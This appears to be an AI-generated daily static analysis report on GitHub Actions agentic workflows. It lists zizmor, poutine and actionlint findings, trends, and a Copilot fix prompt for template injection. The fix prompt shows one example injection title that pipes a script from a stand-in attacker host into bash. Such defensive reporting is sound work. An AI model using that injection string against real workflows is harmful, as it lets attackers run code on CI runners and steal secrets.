Static Analysis Report - 2026-03-31

[github-actions[bot]]

Analysis Summary

Daily static analysis scan of 178 agentic workflows using zizmor, poutine, and actionlint. All 178 workflows compiled successfully (0 compilation errors, 24 warnings). Total findings: 8,562 across all three tools — a slight increase of +42 from yesterday's 8,520.

• Tools Used: zizmor (security), poutine (supply chain), actionlint (linting + shellcheck)
• Total Findings: 8,562
• Workflows Scanned: 178
• Workflows Affected: 178 (all, primarily due to secrets-outside-env)

Findings by Tool

Tool	Total	Critical	High	Medium	Low	Info
zizmor (security)	3,977	0	103	3,849	20	5
poutine (supply chain)	19	0	0	0	2	17
actionlint (linting)	4,566	—	—	—	—	4,566
Total	8,562	0	103	3,849	22	4,588

---

Clustered Findings by Tool and Type

Zizmor Security Findings

Issue Type	Severity	Count	Workflows Affected
secrets-outside-env	Medium	3,847	178 (all)
template-injection	High	102	45
obfuscation	Low	20	20
github-env	High	1	1 (dev-hawk)
artipacked	Medium	1	1 (daily-copilot-token-report)
secrets-inherit	Medium	1	1 (smoke-call-workflow)
unpinned-uses	Informational	5	1 (daily-fact)

Poutine Supply Chain Findings

Issue Type	Severity	Count	Affected Workflows / Files
github_action_from_unverified_creator_used	note	7	smoke-codex, mcp-inspector, super-linter, copilot-setup-steps, daily-copilot-token-report, link-check
untrusted_checkout_exec	error	6	smoke-workflow-call, smoke-workflow-call-with-inputs (already poutine:ignored)
unverified_script_exec	note	2	daily-copilot-token-report, copilot-setup-steps
unpinnable_action	note	2	actions/daily-perf-improver, actions/daily-test-improver
pr_runs_on_self_hosted	warning	2	dev, smoke-copilot-arm

Actionlint Linting Issues

Issue Type	Count	Description
shellcheck SC2086	4,286	Unquoted \$\{RUNNER_TEMP} variables — double-quote to prevent globbing
shellcheck SC2129	173	Use grouped redirects { cmd; } >> file instead of individual redirects
permissions	81	Unknown permission scope copilot-requests (41 workflows)
expression	13	Property activated not defined in activation.outputs
runner-label	12	Unknown runner label aw-gpu-runner-T4 (12 workflows)
shellcheck SC2012	1	Use find instead of ls

---

Top Priority Issues

1. Template Injection (High Severity)

• Tool: zizmor
• Count: 102 occurrences across 45 workflows
• Severity: High
• Affected: audit-workflows, contribution-check, copilot-pr-nlp-analysis, copilot-session-insights, daily-code-metrics, daily-copilot-token-report, daily-doc-updater, daily-firewall-report, daily-integrity-analysis, daily-issues-report, daily-multi-device-docs-tester, daily-news, daily-performance-summary, daily-repo-chronicle, deep-report, discussion-task-miner, docs-noob-tester, github-mcp-structural-analysis, grumpy-reviewer, issue-arborist, issue-monster, issue-triage-agent, org-health-report, plan, poem-bot, portfolio-analyst, pr-triage-agent, python-data-charts, q, refiner, and 15 more
• Description: User-controlled GitHub context values (issue titles, PR titles, comment bodies) are directly interpolated into run: shell scripts via $\{\{ github.event.* }} expressions, enabling arbitrary shell command execution
• Impact: An attacker with the ability to create/edit issues, PRs, or comments can execute arbitrary code in the CI/CD runner environment
• Reference: (docs.zizmor.sh/redacted)

2. Dangerous Use of Environment File — github-env (High Severity)

• Tool: zizmor
• Count: 1 occurrence
• Severity: High
• Affected: dev-hawk
• Description: Writing user-controlled data to $GITHUB_ENV allows injecting environment variables into subsequent steps, potentially leading to code execution or secret theft
• Reference: (docs.zizmor.sh/redacted)

3. Unknown Permission Scope copilot-requests

• Tool: actionlint
• Count: 81 occurrences across 41 workflows
• Description: The copilot-requests: write permission is not recognized by actionlint's known permission scopes. This may be a custom/preview scope — add it to actionlint.yaml config if it's a valid self-hosted scope.

---

Fix Suggestion: template-injection

Issue: User-controlled GitHub context values interpolated directly into shell scripts
Severity: High
Affected Workflows: 45 workflows, 102 occurrences

Prompt to Copilot Agent:

You are fixing a High severity security vulnerability identified by zizmor in GitHub Actions workflows.

**Vulnerability**: Template Injection (template-injection)
**Severity**: High
**Rule Reference**: (docs.zizmor.sh/redacted)

**What's Wrong**:
GitHub Actions expressions like `$\{\{ github.event.issue.title }}`,
`$\{\{ github.event.pull_request.title }}`, `$\{\{ github.event.comment.body }}`,
etc. are directly interpolated into `run:` shell scripts. Since these values
come from untrusted user input, an attacker can inject shell commands by
crafting a PR/issue with a title like:
  `"; curl attacker.com/shell.sh | bash; "`

**Required Fix**:
Move the expression value into an environment variable in an `env:` block,
then reference the env var in the shell script. Environment variables are
NOT subject to template injection because their values are passed out-of-band.

**Example**:

Before (vulnerable):
```yaml
- name: Process issue
  run: |
    echo "Issue: $\{\{ github.event.issue.title }}"
    gh issue comment $\{\{ github.event.issue.number }} --body "Done"

After (fixed):

- name: Process issue
  env:
    ISSUE_TITLE: $\{\{ github.event.issue.title }}
    ISSUE_NUMBER: $\{\{ github.event.issue.number }}
  run: |
    echo "Issue: $ISSUE_TITLE"
    gh issue comment "$ISSUE_NUMBER" --body "Done"

Common untrusted sources to fix:

• $\{\{ github.event.issue.title }} → $ISSUE_TITLE
• $\{\{ github.event.issue.body }} → $ISSUE_BODY
• $\{\{ github.event.pull_request.title }} → $PR_TITLE
• $\{\{ github.event.pull_request.body }} → $PR_BODY
• $\{\{ github.event.comment.body }} → $COMMENT_BODY
• $\{\{ github.head_ref }} → $HEAD_REF
• $\{\{ github.event.discussion.title }} → $DISCUSSION_TITLE

Please apply this fix to all affected .md workflow files (NOT .lock.yml files).
The .lock.yml files are auto-generated — fix the source .md files only.

---

<details>
<summary><b>All Findings Details by Workflow (sample)</b></summary>

#### ace-editor
- SC2086 (×15): Unquoted `\$\{RUNNER_TEMP}` in bash scripts
- expression: `activation.outputs.activated` property not defined
- secrets-outside-env (Medium): secrets referenced at lines 42, 282 (×10)

#### agent-performance-analyzer
- SC2086 (×many): Unquoted `\$\{RUNNER_TEMP}` in bash scripts
- SC2129: Individual redirects instead of grouped
- permissions: `copilot-requests: write` unknown (×2 jobs)
- secrets-outside-env (Medium): secrets at lines 263 (×14), 913 (×4)
- obfuscation (Low): line 132

#### dev-hawk
- **github-env (High)**: Dangerous use of `$GITHUB_ENV` at line 1209

#### daily-copilot-token-report
- artipacked (Medium): credential persistence via artifacts, line 319
- unverified_script_exec: curl pipe to bash, line 336
- github_action_from_unverified_creator_used: astral-sh/setup-uv

#### smoke-call-workflow
- secrets-inherit (Medium): secrets unconditionally inherited, line 770

#### smoke-workflow-call / smoke-workflow-call-with-inputs
- untrusted_checkout_exec (error, poutine:ignored): bash after external checkout

#### daily-fact
- unpinned-uses (Informational): 5 action pins without SHA

</details>

---

### Historical Trends

| Date | Total | Zizmor | Poutine | Actionlint | Compiled |
|------|-------|--------|---------|------------|----------|
| 2026-03-29 | 7,383 | 3,455 | 6 | 3,928 | 157/178 |
| 2026-03-30 | 8,520 | 3,953 | 6 | 4,561 | 178/178 |
| **2026-03-31** | **8,562** | **3,977** | **19** | **4,566** | **178/178** |

**Change from yesterday**: +42 total findings (+24 zizmor, +13 poutine, +5 actionlint)

The increase in poutine findings is primarily due to more detailed reporting of `github_action_from_unverified_creator_used` entries that were previously categorized differently.

#### New Issues Since 2026-03-30
- No new issue *types* detected; slight increase in counts

#### Resolved Issues
- None (all previously identified issue types persist)

---

### Recommendations

1. **Immediate**: Fix the `github-env` High severity issue in `dev-hawk` (1 workflow, easy win)
2. **Short-term**: Address `template-injection` in the 45 affected workflows using the Copilot fix prompt above
3. **Medium-term**: Suppress or configure `copilot-requests: write` in actionlint config to reduce noise (81 false-positive errors)
4. **Long-term**: The `secrets-outside-env` findings (3,847) affect all workflows and are largely by-design for this harness — consider a zizmor config to suppress if the pattern is intentional
5. **Prevention**: The fix prompt above can be run by a Copilot coding agent on each affected `.md` workflow file

### Next Steps

- [ ] Apply template-injection fix to 45 affected workflows using the Copilot agent prompt
- [ ] Review and fix `github-env` issue in `dev-hawk`
- [ ] Add `copilot-requests` to `actionlint.yaml` config to eliminate 81 false-positive permission errors
- [ ] Add `aw-gpu-runner-T4` to `actionlint.yaml` config to eliminate 12 false-positive runner-label errors
- [ ] Evaluate whether `secrets-outside-env` suppressions are appropriate for the harness design

**References:**
- [§23816147164](https://github.com/github/gh-aw/actions/runs/23816147164) — current workflow run


> AI generated by [Static Analysis Report](https://github.com/github/gh-aw/actions/runs/23816147164) · [history](https://github.com/search?q=repo%3Agithub%2Fgh-aw+%22gh-aw-workflow-call-id%3A+github%2Fgh-aw%2Fstatic-analysis-report%22&type=discussions)
> - [x] expires <!-- gh-aw-expires: 2026-04-01T19:52:01.106Z --> on Apr 1, 2026, 7:52 PM UTC

<!-- gh-aw-workflow-id: static-analysis-report -->
<!-- gh-aw-workflow-call-id: github/gh-aw/static-analysis-report -->

[github-actions[bot]]

This discussion has been marked as outdated by Static Analysis Report.

A newer discussion is available at Discussion #23942.